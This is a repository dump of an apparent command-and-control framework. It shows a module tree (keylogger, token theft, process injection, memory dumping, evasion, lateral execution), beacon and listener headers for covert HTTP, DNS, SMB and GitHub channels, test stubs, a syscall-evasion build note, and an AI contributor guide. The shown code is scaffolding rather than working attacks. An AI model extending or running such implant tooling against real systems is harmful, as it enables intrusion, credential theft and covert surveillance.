├── modules ├── Powershell │ ├── PowerShellRunner │ │ ├── .gitignore │ │ ├── compile.bat │ │ ├── System.Management.Automation.dll │ │ └── New-PowerShellRunnerHeader.ps1 │ └── CMakeLists.txt ├── PwSh │ ├── tests │ │ ├── rdm.dll │ │ └── test.ps1 │ ├── PowerShellRunner │ │ ├── rdm.dll │ │ ├── rdm.pdb │ │ ├── compile.bat │ │ └── System.Management.Automation.dll │ ├── AssemblyManager.hpp │ ├── HostMalloc.hpp │ ├── CMakeLists.txt │ ├── AssemblyManager.cpp │ ├── MemoryManager.hpp │ ├── HostControl.cpp │ ├── AssemblyStore.hpp │ └── HostMalloc.cpp ├── ModuleCmd │ ├── syscall.x64.obj │ ├── syscall.x86.obj │ ├── README.md │ ├── tests │ │ ├── testsTools.cpp │ │ └── testsHwbp.cpp │ ├── syscall.cpp │ ├── CMakeLists.txt │ └── hwbp.hpp ├── DotnetExec │ ├── tests │ │ ├── PowerShellRunner.dll │ │ └── project.rc │ ├── PowerShellRunner │ │ └── compile.bat │ ├── AssemblyManager.hpp │ ├── HostMalloc.hpp │ ├── CMakeLists.txt │ ├── AssemblyManager.cpp │ ├── MemoryManager.hpp │ ├── HostControl.cpp │ └── AssemblyStore.hpp ├── MiniDump │ ├── tests │ │ └── testsMiniDump.cpp │ ├── MiniDump.hpp │ └── CMakeLists.txt ├── Chisel │ ├── tests │ │ └── testsChisel.cpp │ ├── Chisel.hpp │ └── CMakeLists.txt ├── AssemblyExec │ ├── tests │ │ └── testOutputWriter.cpp │ └── AssemblyExec.hpp ├── GetEnv │ ├── GetEnv.hpp │ ├── tests │ │ └── testsGetEnv.cpp │ ├── CMakeLists.txt │ └── GetEnv.cpp ├── Remove │ ├── Remove.hpp │ ├── CMakeLists.txt │ └── tests │ │ └── testsRemove.cpp ├── Script │ ├── Script.hpp │ ├── CMakeLists.txt │ └── tests │ │ └── testsScript.cpp ├── Whoami │ ├── Whoami.hpp │ ├── tests │ │ └── testsWhoami.cpp │ └── CMakeLists.txt ├── Netstat │ ├── Netstat.hpp │ ├── tests │ │ └── testsNetstat.cpp │ └── CMakeLists.txt ├── IpConfig │ ├── IpConfig.hpp │ ├── tests │ │ └── testsIpConfig.cpp │ └── CMakeLists.txt ├── Shell │ ├── tests │ │ └── testsShell.cpp │ ├── CMakeLists.txt │ └── Shell.hpp ├── KerberosUseTicket │ ├── tests │ │ └── testsKerberosUseTicket.cpp │ ├── KerberosUseTicket.hpp │ └── CMakeLists.txt ├── KillProcess │ ├── KillProcess.hpp │ ├── CMakeLists.txt │ └── tests │ │ └── testsKillProcess.cpp ├── Rev2self │ ├── Rev2self.hpp │ ├── CMakeLists.txt │ ├── tests │ │ └── testsRev2self.cpp │ └── Rev2self.cpp ├── MkDir │ ├── MkDir.hpp │ ├── CMakeLists.txt │ └── tests │ │ └── testsMkDir.cpp ├── Cat │ ├── CMakeLists.txt │ ├── Cat.hpp │ └── tests │ │ └── testsCat.cpp ├── Run │ ├── CMakeLists.txt │ ├── Run.hpp │ └── tests │ │ └── testsRun.cpp ├── Tree │ ├── Tree.hpp │ └── CMakeLists.txt ├── StealToken │ ├── StealToken.hpp │ ├── CMakeLists.txt │ └── tests │ │ └── testsStealToken.cpp ├── PsExec │ ├── PsExec.hpp │ └── CMakeLists.txt ├── EnumerateShares │ ├── EnumerateShares.hpp │ ├── tests │ │ └── testsEnumerateShares.cpp │ └── CMakeLists.txt ├── Upload │ ├── Upload.hpp │ └── CMakeLists.txt ├── ListProcesses │ ├── ListProcesses.hpp │ ├── CMakeLists.txt │ └── tests │ │ └── testsListProcesses.cpp ├── WmiExec │ ├── CMakeLists.txt │ ├── WmiExec.hpp │ └── tests │ │ └── testsWmiExec.cpp ├── Evasion │ ├── CMakeLists.txt │ └── Evasion.hpp ├── ListDirectory │ ├── ListDirectory.hpp │ ├── CMakeLists.txt │ └── tests │ │ └── testsListDirectory.cpp ├── Registry │ ├── tests │ │ └── testsRegistry.cpp │ ├── CMakeLists.txt │ └── Registry.hpp ├── CoffLoader │ ├── CoffLoader.hpp │ ├── CMakeLists.txt │ └── tests │ │ └── testsCoffLoader.cpp ├── Download │ ├── CMakeLists.txt │ └── Download.hpp ├── ChangeDirectory │ ├── ChangeDirectory.hpp │ └── CMakeLists.txt ├── KeyLogger │ ├── CMakeLists.txt │ ├── tests │ │ └── testsKeyLogger.cpp │ └── KeyLogger.hpp ├── MakeToken │ ├── CMakeLists.txt │ └── MakeToken.hpp ├── Inject │ ├── Inject.hpp │ ├── CMakeLists.txt │ └── tests │ │ └── testsInject.cpp ├── PrintWorkingDirectory │ ├── PrintWorkingDirectory.hpp │ ├── CMakeLists.txt │ ├── tests │ │ └── testsPrintWorkingDirectory.cpp │ └── PrintWorkingDirectory.cpp ├── WinRM │ ├── CMakeLists.txt │ ├── WinRM.hpp │ └── tests │ │ └── testsWinRM.cpp ├── ScreenShot │ ├── CMakeLists.txt │ ├── ScreenShot.hpp │ ├── tests │ │ └── testsScreenShot.cpp │ ├── HandleGuards.h │ └── ScreenShooter.h ├── ModuleTemplate │ ├── ModuleTemplate.hpp │ ├── CMakeLists.txt │ └── tests │ │ └── testsModuleTemplate.cpp ├── CimExec │ ├── CMakeLists.txt │ ├── CimExec.hpp │ └── tests │ │ └── testsCimExec.cpp ├── ReversePortForward │ └── CMakeLists.txt ├── SpawnAs │ ├── CMakeLists.txt │ └── SpawnAs.hpp ├── DcomExec │ ├── CMakeLists.txt │ └── DcomExec.hpp ├── TaskScheduler │ ├── CMakeLists.txt │ └── TaskScheduler.hpp ├── SshExec │ ├── CMakeLists.txt │ ├── tests │ │ └── testsSshExec.cpp │ └── SshExec.hpp ├── EnumerateRdpSessions │ ├── CMakeLists.txt │ ├── EnumerateRdpSessions.hpp │ └── tests │ │ └── testsEnumerateRdpSessions.cpp └── CMakeLists.txt ├── listener ├── tests │ ├── testListenerDns.cpp │ ├── testListenerSmb.cpp │ ├── testListenerTcp.cpp │ ├── testListenerGithub.cpp │ ├── testListener.cpp │ └── CMakeLists.txt ├── ListenerDns.hpp ├── ListenerSmb.hpp ├── ListenerTcp.hpp ├── ListenerGithub.hpp └── ListenerHttp.hpp ├── .gitignore ├── cmake └── C2CoreConfig.cmake.in ├── beacon ├── tests │ ├── testBeaconTcp.cpp │ ├── testBeaconSmb.cpp │ ├── testBeaconDns.cpp │ ├── testBeaconHttp.cpp │ └── testBeaconGithub.cpp ├── BeaconDns.hpp ├── BeaconSmb.hpp ├── BeaconHttp.hpp ├── BeaconTcp.hpp ├── BeaconGithub.hpp ├── BeaconDns.cpp ├── BeaconSmb.cpp ├── BeaconTcp.cpp └── Beacon.hpp ├── AGENT.md ├── .github └── workflows │ ├── Tests_Linux.yml │ ├── Tests_Windows.yml │ └── Release_Linux.yml ├── LICENSE └── README.md /modules/Powershell/PowerShellRunner/.gitignore: -------------------------------------------------------------------------------- 1 | PowerShellRunner.dll 2 | header.h -------------------------------------------------------------------------------- /modules/PwSh/tests/rdm.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxDcb/C2Core/HEAD/modules/PwSh/tests/rdm.dll -------------------------------------------------------------------------------- /modules/ModuleCmd/syscall.x64.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxDcb/C2Core/HEAD/modules/ModuleCmd/syscall.x64.obj -------------------------------------------------------------------------------- /modules/ModuleCmd/syscall.x86.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxDcb/C2Core/HEAD/modules/ModuleCmd/syscall.x86.obj -------------------------------------------------------------------------------- /modules/PwSh/PowerShellRunner/rdm.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxDcb/C2Core/HEAD/modules/PwSh/PowerShellRunner/rdm.dll -------------------------------------------------------------------------------- /modules/PwSh/PowerShellRunner/rdm.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxDcb/C2Core/HEAD/modules/PwSh/PowerShellRunner/rdm.pdb -------------------------------------------------------------------------------- /modules/DotnetExec/tests/PowerShellRunner.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxDcb/C2Core/HEAD/modules/DotnetExec/tests/PowerShellRunner.dll -------------------------------------------------------------------------------- /listener/tests/testListenerDns.cpp: -------------------------------------------------------------------------------- 1 | #include "ListenerDns.hpp" 2 | 3 | int main() { 4 | ListenerDns l("example.com", 53); 5 | return 0; 6 | } 7 | -------------------------------------------------------------------------------- /listener/tests/testListenerSmb.cpp: -------------------------------------------------------------------------------- 1 | #include "ListenerSmb.hpp" 2 | 3 | int main() { 4 | ListenerSmb l("host", "pipe"); 5 | return 0; 6 | } 7 | -------------------------------------------------------------------------------- /listener/tests/testListenerTcp.cpp: -------------------------------------------------------------------------------- 1 | #include "ListenerTcp.hpp" 2 | 3 | int main() { 4 | ListenerTcp l("127.0.0.1", 1); 5 | return 0; 6 | } 7 | -------------------------------------------------------------------------------- /listener/tests/testListenerGithub.cpp: -------------------------------------------------------------------------------- 1 | #include "ListenerGithub.hpp" 2 | 3 | int main() { 4 | ListenerGithub l("project", "token"); 5 | return 0; 6 | } 7 | -------------------------------------------------------------------------------- /modules/PwSh/PowerShellRunner/compile.bat: -------------------------------------------------------------------------------- 1 | csc /debug:portable rdm.cs /r:System.Management.Automation.dll /target:library 2 | powershell .\New-PowerShellRunnerHeader.ps1 -------------------------------------------------------------------------------- /modules/Powershell/PowerShellRunner/compile.bat: -------------------------------------------------------------------------------- 1 | csc PowerShellRunner.cs /r:System.Management.Automation.dll /target:library 2 | powershell .\New-PowerShellRunnerHeader.ps1 -------------------------------------------------------------------------------- /modules/PwSh/PowerShellRunner/System.Management.Automation.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxDcb/C2Core/HEAD/modules/PwSh/PowerShellRunner/System.Management.Automation.dll -------------------------------------------------------------------------------- /modules/DotnetExec/PowerShellRunner/compile.bat: -------------------------------------------------------------------------------- 1 | csc /debug:portable rdm.cs /r:System.Management.Automation.dll /target:library 2 | powershell .\New-PowerShellRunnerHeader.ps1 -------------------------------------------------------------------------------- /modules/Powershell/PowerShellRunner/System.Management.Automation.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maxDcb/C2Core/HEAD/modules/Powershell/PowerShellRunner/System.Management.Automation.dll -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | modules/ModuleCmd/base64.* 2 | modules/ModuleCmd/nlohmann/ 3 | modules/Release/ 4 | modules/Tests/ 5 | modules/build/ 6 | Release/ 7 | Tests/ 8 | build/ 9 | package/ 10 | thirdParty/ 11 | -------------------------------------------------------------------------------- /cmake/C2CoreConfig.cmake.in: -------------------------------------------------------------------------------- 1 | @PACKAGE_INIT@ 2 | 3 | include(CMakeFindDependencyMacro) 4 | find_dependency(OpenSSL) 5 | find_dependency(Threads) 6 | 7 | include("${CMAKE_CURRENT_LIST_DIR}/C2CoreTargets.cmake") 8 | 9 | -------------------------------------------------------------------------------- /beacon/tests/testBeaconTcp.cpp: -------------------------------------------------------------------------------- 1 | #include "BeaconTcp.hpp" 2 | 3 | int main() { 4 | std::string config = R"({"xorKey":"key","ModulesConfig":{}})"; 5 | std::string ip = "127.0.0.1"; 6 | int port = 1; 7 | BeaconTcp b(config, ip, port); 8 | return 0; 9 | } 10 | -------------------------------------------------------------------------------- /beacon/tests/testBeaconSmb.cpp: -------------------------------------------------------------------------------- 1 | #include "BeaconSmb.hpp" 2 | 3 | int main() { 4 | std::string config = R"({"xorKey":"key","ModulesConfig":{}})"; 5 | std::string host = "localhost"; 6 | std::string pipe = "test"; 7 | BeaconSmb b(config, host, pipe); 8 | return 0; 9 | } 10 | -------------------------------------------------------------------------------- /beacon/tests/testBeaconDns.cpp: -------------------------------------------------------------------------------- 1 | #include "BeaconDns.hpp" 2 | 3 | int main() { 4 | std::string config = R"({"xorKey":"key","ModulesConfig":{}})"; 5 | std::string dnsServer = "8.8.8.8"; 6 | std::string domain = "example.com"; 7 | BeaconDns b(config, dnsServer, domain); 8 | return 0; 9 | } 10 | -------------------------------------------------------------------------------- /beacon/tests/testBeaconHttp.cpp: -------------------------------------------------------------------------------- 1 | #define CPPHTTPLIB_OPENSSL_SUPPORT 2 | #include "BeaconHttp.hpp" 3 | 4 | int main() { 5 | std::string config = R"({"xorKey":"key","ModulesConfig":{}})"; 6 | std::string ip = "127.0.0.1"; 7 | int port = 8080; 8 | BeaconHttp b(config, ip, port, false); 9 | return 0; 10 | } 11 | -------------------------------------------------------------------------------- /modules/ModuleCmd/README.md: -------------------------------------------------------------------------------- 1 | # Syscall 2 | 3 | see https://github.com/klezVirus/SysWhispers3 4 | 5 | First you need to compile syscall.x64.asm from a windows machine using: 6 | 7 | ``` 8 | ML64 /c syscall.x64.asm /link /NODEFAULTLIB /RELEASE /MACHINE:X64 9 | ml /c /coff /safeseh syscall.x86.asm /link /NODEFAULTLIB /RELEASE 10 | ``` -------------------------------------------------------------------------------- /beacon/tests/testBeaconGithub.cpp: -------------------------------------------------------------------------------- 1 | #define CPPHTTPLIB_OPENSSL_SUPPORT 2 | #include "BeaconGithub.hpp" 3 | 4 | int main() { 5 | std::string config = R"({"xorKey":"key","ModulesConfig":{}})"; 6 | std::string project = "project"; 7 | std::string token = "token"; 8 | BeaconGithub b(config, project, token); 9 | return 0; 10 | } 11 | -------------------------------------------------------------------------------- /beacon/BeaconDns.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Beacon.hpp" 4 | 5 | namespace dns 6 | { 7 | class Client; 8 | } 9 | 10 | class BeaconDns : public Beacon 11 | { 12 | 13 | public: 14 | BeaconDns(std::string& config, const std::string& dnsServer, const std::string& domain); 15 | ~BeaconDns(); 16 | 17 | private: 18 | void checkIn(); 19 | 20 | dns::Client* m_client; 21 | }; 22 | -------------------------------------------------------------------------------- /beacon/BeaconSmb.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Beacon.hpp" 4 | 5 | 6 | namespace PipeHandler 7 | { 8 | class Client; 9 | } 10 | 11 | class BeaconSmb : public Beacon 12 | { 13 | 14 | public: 15 | BeaconSmb(std::string& config, const std::string& ip, const std::string& pipeName); 16 | ~BeaconSmb(); 17 | 18 | private: 19 | void checkIn(); 20 | 21 | PipeHandler::Client* m_clientSmb; 22 | 23 | }; 24 | -------------------------------------------------------------------------------- /beacon/BeaconHttp.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Beacon.hpp" 4 | 5 | 6 | class BeaconHttp : public Beacon 7 | { 8 | 9 | public: 10 | BeaconHttp(std::string& config, std::string& ip, int port, bool https=false); 11 | ~BeaconHttp(); 12 | 13 | void checkIn(); 14 | 15 | private: 16 | std::string m_ip; 17 | int m_port; 18 | 19 | nlohmann::json m_beaconHttpConfig; 20 | bool m_isHttps; 21 | 22 | }; 23 | -------------------------------------------------------------------------------- /AGENT.md: -------------------------------------------------------------------------------- 1 | # AGENT.md — C2Core 2 | 3 | ## Purpose 4 | 5 | You are an expert C++/CMake contributor tasked with maintaining, and expending **C2Core**. 6 | 7 | - Keep changes portable (Linux/Windows), and covered by tests. 8 | - Match the project’s coding style and folder layout already in use. 9 | 10 | ## Quick Start (Linux) 11 | 12 | ```bash 13 | mkdir -p build && cd build 14 | cmake -DC2CORE_BUILD_TESTS=ON .. 15 | cmake --build . -j 16 | 17 | ctest --output-on-failure 18 | ``` 19 | -------------------------------------------------------------------------------- /beacon/BeaconTcp.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Beacon.hpp" 4 | 5 | class SocketTunnelClient; 6 | 7 | 8 | class BeaconTcp : public Beacon 9 | { 10 | 11 | public: 12 | BeaconTcp(std::string& config, std::string& ip, int port); 13 | ~BeaconTcp(); 14 | 15 | private: 16 | std::string m_ip; 17 | int m_port; 18 | 19 | void checkIn(); 20 | 21 | int splitInPacket(const std::string& input, std::vector& output); 22 | 23 | SocketTunnelClient* m_client; 24 | }; 25 | -------------------------------------------------------------------------------- /listener/ListenerDns.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Listener.hpp" 4 | 5 | 6 | namespace dns 7 | { 8 | class Server; 9 | } 10 | 11 | class ListenerDns : public Listener 12 | { 13 | 14 | public: 15 | ListenerDns(const std::string& domainToResolve, int port, const nlohmann::json& config = nlohmann::json::object()); 16 | ~ListenerDns(); 17 | 18 | private: 19 | void launchDnsListener(); 20 | 21 | dns::Server* m_serverDns; 22 | 23 | bool m_stopThread; 24 | std::unique_ptr m_dnsListener; 25 | }; 26 | -------------------------------------------------------------------------------- /listener/ListenerSmb.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Listener.hpp" 4 | 5 | 6 | namespace PipeHandler 7 | { 8 | class Server; 9 | } 10 | 11 | class ListenerSmb : public Listener 12 | { 13 | 14 | public: 15 | ListenerSmb(const std::string& ip, const std::string& pipeName, const nlohmann::json& config = nlohmann::json::object()); 16 | ~ListenerSmb(); 17 | 18 | private: 19 | void launchSmbServ(); 20 | 21 | PipeHandler::Server* m_serverSmb; 22 | 23 | bool m_stopThread; 24 | std::unique_ptr m_smbServ; 25 | }; 26 | -------------------------------------------------------------------------------- /modules/MiniDump/tests/testsMiniDump.cpp: -------------------------------------------------------------------------------- 1 | #include "../MiniDump.hpp" 2 | 3 | #include 4 | 5 | #ifdef __linux__ 6 | #elif _WIN32 7 | #include 8 | #endif 9 | 10 | bool testMinidump(); 11 | 12 | int main() 13 | { 14 | bool res; 15 | 16 | std::cout << "[+] testMinidump" << std::endl; 17 | res = testMinidump(); 18 | if (res) 19 | std::cout << "[+] Sucess" << std::endl; 20 | else 21 | std::cout << "[-] Failed" << std::endl; 22 | 23 | return !res; 24 | } 25 | 26 | 27 | bool testMinidump() 28 | { 29 | return true; 30 | } -------------------------------------------------------------------------------- /modules/PwSh/tests/test.ps1: -------------------------------------------------------------------------------- 1 | # Define a test function 2 | function Get-ProcessInfo { 3 | Write-Host "=== Running Get-ProcessInfo ===" 4 | $process = Get-Process | Select-Object -First 1 5 | Write-Host "Process: $($process.ProcessName) - ID: $($process.Id)" 6 | } 7 | 8 | # Call the function 9 | Get-ProcessInfo 10 | 11 | # Set a variable and display it 12 | $x = 42 13 | Write-Host "`n=== Variable Test ===" 14 | Write-Host "The value of x is: $x" 15 | 16 | # Execute a standard command 17 | Write-Host "`n=== Executing 'Get-Process' ===" 18 | Get-Process | Select-Object -First 3 19 | -------------------------------------------------------------------------------- /modules/Chisel/tests/testsChisel.cpp: -------------------------------------------------------------------------------- 1 | #include "../Chisel.hpp" 2 | 3 | #ifdef __linux__ 4 | #elif _WIN32 5 | #include 6 | #endif 7 | 8 | bool testChisel(); 9 | 10 | int main() 11 | { 12 | bool res; 13 | 14 | std::cout << "[+] testChisel" << std::endl; 15 | res = testChisel(); 16 | if (res) 17 | std::cout << "[+] Sucess" << std::endl; 18 | else 19 | std::cout << "[-] Failed" << std::endl; 20 | 21 | return 0; 22 | } 23 | 24 | 25 | bool testChisel() 26 | { 27 | // std::unique_ptr Chisel = std::make_unique(); 28 | // { 29 | // } 30 | 31 | return false; 32 | } -------------------------------------------------------------------------------- /listener/ListenerTcp.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Listener.hpp" 4 | 5 | 6 | class SocketServer; 7 | 8 | class ListenerTcp : public Listener 9 | { 10 | 11 | public: 12 | ListenerTcp(const std::string& ip, int localport, const nlohmann::json& config = nlohmann::json::object()); 13 | ~ListenerTcp(); 14 | 15 | int init(); 16 | 17 | private: 18 | void launchTcpServ(); 19 | int splitInPacket(const std::string& input, std::vector& output); 20 | 21 | SocketServer* m_serverTcp; 22 | 23 | int m_port; 24 | 25 | bool m_stopThread; 26 | std::unique_ptr m_tcpServ; 27 | }; 28 | -------------------------------------------------------------------------------- /modules/AssemblyExec/tests/testOutputWriter.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | int main() 6 | { 7 | for(int i = 0; i<10 ; i++) 8 | { 9 | for(int j = 0; j<400 ; j++) 10 | { 11 | std::cout << char(41)+i; 12 | } 13 | std::cout << std::endl; 14 | 15 | std::this_thread::sleep_for(std::chrono::milliseconds(100)); 16 | } 17 | std::cout << "" << std::endl; 18 | 19 | for(int j = 0; j<4000 ; j++) 20 | { 21 | std::cout << "ZO"; 22 | } 23 | for(int j = 0; j<4000 ; j++) 24 | { 25 | std::cout << "ZA"; 26 | } 27 | std::cout << std::endl; 28 | } -------------------------------------------------------------------------------- /listener/ListenerGithub.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Listener.hpp" 4 | 5 | #define CPPHTTPLIB_OPENSSL_SUPPORT 6 | #include "httplib.h" 7 | 8 | 9 | class ListenerGithub : public Listener 10 | { 11 | 12 | public: 13 | ListenerGithub(const std::string& project, const std::string& token, const nlohmann::json& config = nlohmann::json::object()); 14 | ~ListenerGithub(); 15 | 16 | private: 17 | void checkGithubIssues(); 18 | int HandleCheckIn(const std::string& req, std::string& res); 19 | 20 | std::string m_project; 21 | std::string m_token; 22 | 23 | bool m_isRunning; 24 | std::unique_ptr m_githubFetcher; 25 | }; 26 | -------------------------------------------------------------------------------- /modules/GetEnv/GetEnv.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | class GetEnv : public ModuleCmd 6 | { 7 | public: 8 | GetEnv(); 9 | ~GetEnv(); 10 | 11 | std::string getInfo(); 12 | 13 | int init(std::vector& splitedCmd, C2Message& c2Message); 14 | int process(C2Message& c2Message, C2Message& c2RetMessage); 15 | int osCompatibility() 16 | { 17 | return OS_LINUX | OS_WINDOWS; 18 | } 19 | 20 | private: 21 | std::string listEnv(); 22 | }; 23 | 24 | #ifdef _WIN32 25 | extern "C" __declspec(dllexport) GetEnv* GetEnvConstructor(); 26 | #else 27 | extern "C" __attribute__((visibility("default"))) GetEnv* GetEnvConstructor(); 28 | #endif 29 | -------------------------------------------------------------------------------- /modules/Remove/Remove.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | class Remove : public ModuleCmd 6 | { 7 | public: 8 | Remove(); 9 | ~Remove(); 10 | 11 | std::string getInfo(); 12 | 13 | int init(std::vector& splitedCmd, C2Message& c2Message); 14 | int process(C2Message& c2Message, C2Message& c2RetMessage); 15 | int errorCodeToMsg(const C2Message &c2RetMessage, std::string& errorMsg); 16 | int osCompatibility() {return OS_LINUX | OS_WINDOWS;} 17 | }; 18 | 19 | #ifdef _WIN32 20 | extern "C" __declspec(dllexport) Remove * RemoveConstructor(); 21 | #else 22 | extern "C" __attribute__((visibility("default"))) Remove * RemoveConstructor(); 23 | #endif 24 | -------------------------------------------------------------------------------- /modules/Script/Script.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | 6 | class Script : public ModuleCmd 7 | { 8 | 9 | public: 10 | Script(); 11 | ~Script(); 12 | 13 | std::string getInfo(); 14 | 15 | int init(std::vector& splitedCmd, C2Message& c2Message); 16 | int process(C2Message& c2Message, C2Message& c2RetMessage); 17 | int osCompatibility() 18 | { 19 | return OS_LINUX; 20 | } 21 | 22 | private: 23 | 24 | }; 25 | 26 | 27 | #ifdef _WIN32 28 | 29 | extern "C" __declspec(dllexport) Script * ScriptConstructor(); 30 | 31 | #else 32 | 33 | extern "C" __attribute__((visibility("default"))) Script * ScriptConstructor(); 34 | 35 | #endif -------------------------------------------------------------------------------- /modules/Whoami/Whoami.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | class Whoami : public ModuleCmd 6 | { 7 | public: 8 | Whoami(); 9 | ~Whoami(); 10 | 11 | std::string getInfo(); 12 | 13 | int init(std::vector& splitedCmd, C2Message& c2Message); 14 | int process(C2Message& c2Message, C2Message& c2RetMessage); 15 | int osCompatibility() 16 | { 17 | return OS_LINUX | OS_WINDOWS; 18 | } 19 | 20 | private: 21 | std::string getInfoString(); 22 | }; 23 | 24 | #ifdef _WIN32 25 | extern "C" __declspec(dllexport) Whoami* WhoamiConstructor(); 26 | #else 27 | extern "C" __attribute__((visibility("default"))) Whoami* WhoamiConstructor(); 28 | #endif 29 | -------------------------------------------------------------------------------- /modules/Netstat/Netstat.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | class Netstat : public ModuleCmd 6 | { 7 | public: 8 | Netstat(); 9 | ~Netstat(); 10 | 11 | std::string getInfo(); 12 | 13 | int init(std::vector& splitedCmd, C2Message& c2Message); 14 | int process(C2Message& c2Message, C2Message& c2RetMessage); 15 | int osCompatibility() 16 | { 17 | return OS_LINUX | OS_WINDOWS; 18 | } 19 | 20 | private: 21 | std::string runNetstat(); 22 | }; 23 | 24 | #ifdef _WIN32 25 | extern "C" __declspec(dllexport) Netstat* NetstatConstructor(); 26 | #else 27 | extern "C" __attribute__((visibility("default"))) Netstat* NetstatConstructor(); 28 | #endif 29 | -------------------------------------------------------------------------------- /beacon/BeaconGithub.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Beacon.hpp" 4 | 5 | 6 | class BeaconGithub : public Beacon 7 | { 8 | 9 | public: 10 | BeaconGithub(std::string& config, const std::string& project, const std::string& token); 11 | ~BeaconGithub(); 12 | 13 | void checkIn(); 14 | 15 | private: 16 | std::string m_project; 17 | std::string m_token; 18 | 19 | #ifdef _WIN32 20 | int HandleRequest(const std::string& domain, const std::string& url); 21 | 22 | int GithubPost(const std::string& domain, const std::string& url, const std::string& data, std::string &response); 23 | int GithubGet(const std::string& domain, const std::string& url, std::string &response); 24 | #endif 25 | 26 | }; 27 | -------------------------------------------------------------------------------- /modules/IpConfig/IpConfig.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | class IpConfig : public ModuleCmd 6 | { 7 | public: 8 | IpConfig(); 9 | ~IpConfig(); 10 | 11 | std::string getInfo(); 12 | 13 | int init(std::vector& splitedCmd, C2Message& c2Message); 14 | int process(C2Message& c2Message, C2Message& c2RetMessage); 15 | int osCompatibility() 16 | { 17 | return OS_LINUX | OS_WINDOWS; 18 | } 19 | 20 | private: 21 | std::string runIpconfig(); 22 | }; 23 | 24 | #ifdef _WIN32 25 | extern "C" __declspec(dllexport) IpConfig* IpConfigConstructor(); 26 | #else 27 | extern "C" __attribute__((visibility("default"))) IpConfig* IpConfigConstructor(); 28 | #endif 29 | -------------------------------------------------------------------------------- /modules/Shell/tests/testsShell.cpp: -------------------------------------------------------------------------------- 1 | #include "../Shell.hpp" 2 | #include 3 | 4 | int main() 5 | { 6 | Shell shell; 7 | std::vector cmd = {"shell"}; 8 | C2Message msg, ret; 9 | shell.init(cmd, msg); 10 | shell.process(msg, ret); 11 | 12 | cmd = {"shell", "echo", "hello"}; 13 | shell.init(cmd, msg); 14 | msg.set_cmd("echo hello"); 15 | shell.process(msg, ret); 16 | bool ok = ret.returnvalue().find("hello") != std::string::npos; 17 | 18 | cmd = {"shell", "exit"}; 19 | shell.init(cmd, msg); 20 | msg.set_cmd("exit"); 21 | shell.process(msg, ret); 22 | 23 | std::cout << (ok ? "[+]" : "[-]") << " shell test" << std::endl; 24 | return ok ? 0 : 1; 25 | } 26 | -------------------------------------------------------------------------------- /modules/KerberosUseTicket/tests/testsKerberosUseTicket.cpp: -------------------------------------------------------------------------------- 1 | #include "../KerberosUseTicket.hpp" 2 | 3 | #ifdef __linux__ 4 | #elif _WIN32 5 | #include 6 | #endif 7 | 8 | bool testKerberosUseTicket(); 9 | 10 | int main() 11 | { 12 | bool res; 13 | 14 | std::cout << "[+] testKerberosUseTicket" << std::endl; 15 | res = testKerberosUseTicket(); 16 | if (res) 17 | std::cout << "[+] Sucess" << std::endl; 18 | else 19 | std::cout << "[-] Failed" << std::endl; 20 | 21 | return 0; 22 | } 23 | 24 | 25 | bool testKerberosUseTicket() 26 | { 27 | // std::unique_ptr KerberosUseTicket = std::make_unique(); 28 | // { 29 | // } 30 | 31 | return false; 32 | } -------------------------------------------------------------------------------- /modules/KillProcess/KillProcess.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | class KillProcess : public ModuleCmd 6 | { 7 | public: 8 | KillProcess(); 9 | ~KillProcess(); 10 | 11 | std::string getInfo(); 12 | 13 | int init(std::vector& splitedCmd, C2Message& c2Message); 14 | int process(C2Message& c2Message, C2Message& c2RetMessage); 15 | int errorCodeToMsg(const C2Message &c2RetMessage, std::string& errorMsg); 16 | int osCompatibility() {return OS_LINUX | OS_WINDOWS;} 17 | }; 18 | 19 | #ifdef _WIN32 20 | extern "C" __declspec(dllexport) KillProcess * KillProcessConstructor(); 21 | #else 22 | extern "C" __attribute__((visibility("default"))) KillProcess * KillProcessConstructor(); 23 | #endif 24 | -------------------------------------------------------------------------------- /modules/Rev2self/Rev2self.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | 6 | class Rev2self : public ModuleCmd 7 | { 8 | 9 | public: 10 | Rev2self(); 11 | ~Rev2self(); 12 | 13 | std::string getInfo(); 14 | 15 | int init(std::vector& splitedCmd, C2Message& c2Message); 16 | int process(C2Message& c2Message, C2Message& c2RetMessage); 17 | int osCompatibility() 18 | { 19 | return OS_WINDOWS; 20 | } 21 | 22 | private: 23 | std::string rev2self(); 24 | }; 25 | 26 | 27 | #ifdef _WIN32 28 | 29 | extern "C" __declspec(dllexport) Rev2self * 